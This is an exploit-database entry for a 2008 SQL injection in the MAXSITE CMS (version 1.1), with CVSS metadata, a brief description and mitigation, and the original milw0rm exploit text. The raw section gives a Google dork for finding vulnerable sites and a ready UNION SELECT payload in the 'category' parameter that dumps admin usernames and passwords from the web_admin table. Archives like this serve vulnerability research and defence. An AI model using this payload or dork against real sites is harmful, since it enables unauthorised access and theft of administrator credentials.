CMS MAXSITE Remote SQL Injection Exploit

vendor:

MAXSITE

by:

Tesz

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: MAXSITE

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE: N/A

CPE: a:maxsite:maxsite

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

CMS MAXSITE Remote SQL Injection Exploit <= 1.10

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'name' and 'category' parameters of the 'index.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation allows an attacker to gain access to the vulnerable system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should sanitize user-supplied input before using it in SQL queries.

Source

Exploit-DB raw data:

#########################################################################

CMS MAXSITE Remote SQL Injection Exploit <= 1.10

#########################################################################


[+] Author: Tesz [@] THD
[+] Home: http://www.thaishadow.com
[+] Forum: http://www.thaishadow.com/board/index.php

[+] Download: http://maxsite.geniuscyber.com/index.php?name=index

[+] Dork: MAXSITE or intitle:"MAXSITE"

[+] Exploit: http://server.com/path/index.php?name=webboard&category=1+and+1=2+union+select+concat(username,0x3A,password)+from+web_admin/*

[+] index.php?name=webboard&category=1+and+1=2+union+select+concat(username,0x3A,password)+from+web_admin/*

[+] Greetz: krit,Exploiters,PongZ,{OHM},Usermode,windows98SE,azazel,Mr`Ping,Os555,[T]he[S]hak
[+] Special Thx: THD (Thaishadow Team)


###########################################################################

# milw0rm.com [2008-05-26]